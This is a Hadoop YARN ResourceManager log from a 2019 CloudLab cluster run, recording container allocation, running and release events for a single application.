2019-09-23 17:12:43,132 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000002 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:12:43,132 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000002
2019-09-23 17:12:43,133 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0003_01_000002 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 2 containers, <memory:3072, vCores:2> used and <memory:62464, vCores:30> available after allocation
2019-09-23 17:12:43,875 INFO org.apache.hadoop.yarn.server.resourcemanager.security.NMTokenSecretManagerInRM: Sending NMToken for nodeId : cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 for container : container_1569279589137_0003_01_000002
2019-09-23 17:12:43,877 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000002 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:12:44,132 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000002 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:12:44,133 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000003 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:12:44,133 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000003
2019-09-23 17:12:44,133 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0003_01_000003 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 3 containers, <memory:4096, vCores:3> used and <memory:61440, vCores:29> available after allocation
2019-09-23 17:12:44,896 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000003 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:12:45,134 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000003 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:12:45,136 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000004 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:12:45,136 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000004
2019-09-23 17:12:45,137 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0003_01_000004 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 4 containers, <memory:5120, vCores:4> used and <memory:60416, vCores:28> available after allocation
2019-09-23 17:12:45,904 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000004 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:12:46,136 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000004 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:12:46,138 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000005 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:12:46,138 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000005
2019-09-23 17:12:46,138 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0003_01_000005 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 5 containers, <memory:6144, vCores:5> used and <memory:59392, vCores:27> available after allocation
2019-09-23 17:12:46,482 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000006 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:12:46,482 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000006
2019-09-23 17:12:46,482 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0003_01_000006 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 6 containers, <memory:7168, vCores:6> used and <memory:58368, vCores:26> available after allocation
2019-09-23 17:12:46,912 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000005 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:12:46,914 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000006 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:12:47,484 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000005 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:12:47,485 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000006 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:12:47,485 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000002 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:12:47,485 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0003_01_000002 in state: COMPLETED event:FINISHED
2019-09-23 17:12:47,485 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000002
2019-09-23 17:12:47,485 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0003_01_000002 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 5 containers, <memory:6144, vCores:5> used and <memory:59392, vCores:27> available, release resources=true
2019-09-23 17:12:47,485 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0003_000001 released container container_1569279589137_0003_01_000002 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=5 available=<memory:59392, vCores:27> used=<memory:6144, vCores:5> with event: FINISHED
2019-09-23 17:12:47,486 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000007 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:12:47,486 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000007
2019-09-23 17:12:47,486 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0003_01_000007 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 6 containers, <memory:7168, vCores:6> used and <memory:58368, vCores:26> available after allocation
2019-09-23 17:12:47,573 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000008 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:12:47,573 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000008
2019-09-23 17:12:47,574 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0003_01_000008 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 7 containers, <memory:8192, vCores:7> used and <memory:57344, vCores:25> available after allocation
2019-09-23 17:12:47,922 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000007 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:12:47,924 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000008 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:12:48,576 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000007 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:12:48,576 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000008 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:12:48,577 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000003 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:12:48,577 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0003_01_000003 in state: COMPLETED event:FINISHED
2019-09-23 17:12:48,579 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000003
2019-09-23 17:12:48,579 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0003_01_000003 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 6 containers, <memory:7168, vCores:6> used and <memory:58368, vCores:26> available, release resources=true
2019-09-23 17:12:48,579 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0003_000001 released container container_1569279589137_0003_01_000003 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=6 available=<memory:58368, vCores:26> used=<memory:7168, vCores:6> with event: FINISHED
2019-09-23 17:12:48,579 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000009 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:12:48,579 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000009
2019-09-23 17:12:48,579 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0003_01_000009 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 7 containers, <memory:8192, vCores:7> used and <memory:57344, vCores:25> available after allocation
2019-09-23 17:12:48,858 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000010 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:12:48,858 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000010
2019-09-23 17:12:48,858 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0003_01_000010 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 8 containers, <memory:9216, vCores:8> used and <memory:56320, vCores:24> available after allocation
2019-09-23 17:12:48,937 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000009 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:12:48,939 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000010 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:12:49,860 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000009 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:12:49,861 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000010 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:12:49,861 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000004 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:12:49,861 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0003_01_000004 in state: COMPLETED event:FINISHED
2019-09-23 17:12:49,861 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000004
2019-09-23 17:12:49,862 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0003_01_000004 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 7 containers, <memory:8192, vCores:7> used and <memory:57344, vCores:25> available, release resources=true
2019-09-23 17:12:49,862 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0003_000001 released container container_1569279589137_0003_01_000004 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=7 available=<memory:57344, vCores:25> used=<memory:8192, vCores:7> with event: FINISHED
2019-09-23 17:12:49,862 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000011 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:12:49,862 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000011
2019-09-23 17:12:49,862 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0003_01_000011 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 8 containers, <memory:9216, vCores:8> used and <memory:56320, vCores:24> available after allocation
2019-09-23 17:12:49,950 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000011 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:12:50,068 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000011 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:12:50,069 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000012 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:12:50,069 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000012
2019-09-23 17:12:50,069 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0003_01_000012 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 9 containers, <memory:10240, vCores:9> used and <memory:55296, vCores:23> available after allocation
2019-09-23 17:12:50,225 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000006 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:12:50,225 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0003_01_000006 in state: COMPLETED event:FINISHED
2019-09-23 17:12:50,225 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000006
2019-09-23 17:12:50,225 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0003_01_000006 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 8 containers, <memory:9216, vCores:8> used and <memory:56320, vCores:24> available, release resources=true
2019-09-23 17:12:50,225 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0003_000001 released container container_1569279589137_0003_01_000006 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=8 available=<memory:56320, vCores:24> used=<memory:9216, vCores:8> with event: FINISHED
2019-09-23 17:12:50,226 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000013 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:12:50,226 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000013
2019-09-23 17:12:50,226 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0003_01_000013 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 9 containers, <memory:10240, vCores:9> used and <memory:55296, vCores:23> available after allocation
2019-09-23 17:12:50,957 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000012 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:12:50,958 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000013 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:12:51,226 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000012 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:12:51,227 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000013 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:12:51,228 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000005 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:12:51,228 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0003_01_000005 in state: COMPLETED event:FINISHED
2019-09-23 17:12:51,228 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000005
2019-09-23 17:12:51,228 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0003_01_000005 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 8 containers, <memory:9216, vCores:8> used and <memory:56320, vCores:24> available, release resources=true
2019-09-23 17:12:51,228 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0003_000001 released container container_1569279589137_0003_01_000005 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=8 available=<memory:56320, vCores:24> used=<memory:9216, vCores:8> with event: FINISHED
2019-09-23 17:12:51,228 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000014 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:12:51,228 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000014
2019-09-23 17:12:51,228 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0003_01_000014 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 9 containers, <memory:10240, vCores:9> used and <memory:55296, vCores:23> available after allocation
2019-09-23 17:12:51,317 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000015 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:12:51,317 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000015
2019-09-23 17:12:51,317 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0003_01_000015 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 10 containers, <memory:11264, vCores:10> used and <memory:54272, vCores:22> available after allocation
2019-09-23 17:12:51,400 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000007 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:12:51,400 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0003_01_000007 in state: COMPLETED event:FINISHED
2019-09-23 17:12:51,400 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000007
2019-09-23 17:12:51,401 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0003_01_000007 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 9 containers, <memory:10240, vCores:9> used and <memory:55296, vCores:23> available, release resources=true
2019-09-23 17:12:51,401 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0003_000001 released container container_1569279589137_0003_01_000007 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=9 available=<memory:55296, vCores:23> used=<memory:10240, vCores:9> with event: FINISHED
2019-09-23 17:12:51,401 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000016 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:12:51,401 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000016
2019-09-23 17:12:51,401 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0003_01_000016 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 10 containers, <memory:11264, vCores:10> used and <memory:54272, vCores:22> available after allocation
2019-09-23 17:12:51,964 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000014 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:12:51,965 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000015 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:12:51,966 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000016 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:12:52,403 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000014 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:12:52,403 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000015 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:12:52,403 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000016 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 17:12:52,403 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000008 Container Transitioned from RUNNING to COMPLETED
2019-09-23 17:12:52,404 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569279589137_0003_01_000008 in state: COMPLETED event:FINISHED
2019-09-23 17:12:52,404 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000008
2019-09-23 17:12:52,404 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569279589137_0003_01_000008 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which currently has 9 containers, <memory:10240, vCores:9> used and <memory:55296, vCores:23> available, release resources=true
2019-09-23 17:12:52,404 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569279589137_0003_000001 released container container_1569279589137_0003_01_000008 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207 #containers=9 available=<memory:55296, vCores:23> used=<memory:10240, vCores:9> with event: FINISHED
2019-09-23 17:12:52,404 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000017 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:12:52,405 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000017
2019-09-23 17:12:52,405 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0003_01_000017 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 10 containers, <memory:11264, vCores:10> used and <memory:54272, vCores:22> available after allocation
2019-09-23 17:12:52,970 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.AppSchedulingInfo: checking for deactivate of application :application_1569279589137_0003
2019-09-23 17:12:52,972 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000017 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 17:12:53,406 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000018 Container Transitioned from NEW to ALLOCATED
2019-09-23 17:12:53,406 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569279589137_0003	CONTAINERID=container_1569279589137_0003_01_000018
2019-09-23 17:12:53,407 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569279589137_0003_01_000018 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:42207, which has 11 containers, <memory:12288, vCores:11> used and <memory:53248, vCores:21> available after allocation
2019-09-23 17:12:53,978 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569279589137_0003_01_000017 Container Transitioned from ACQUIRED to RELEASED
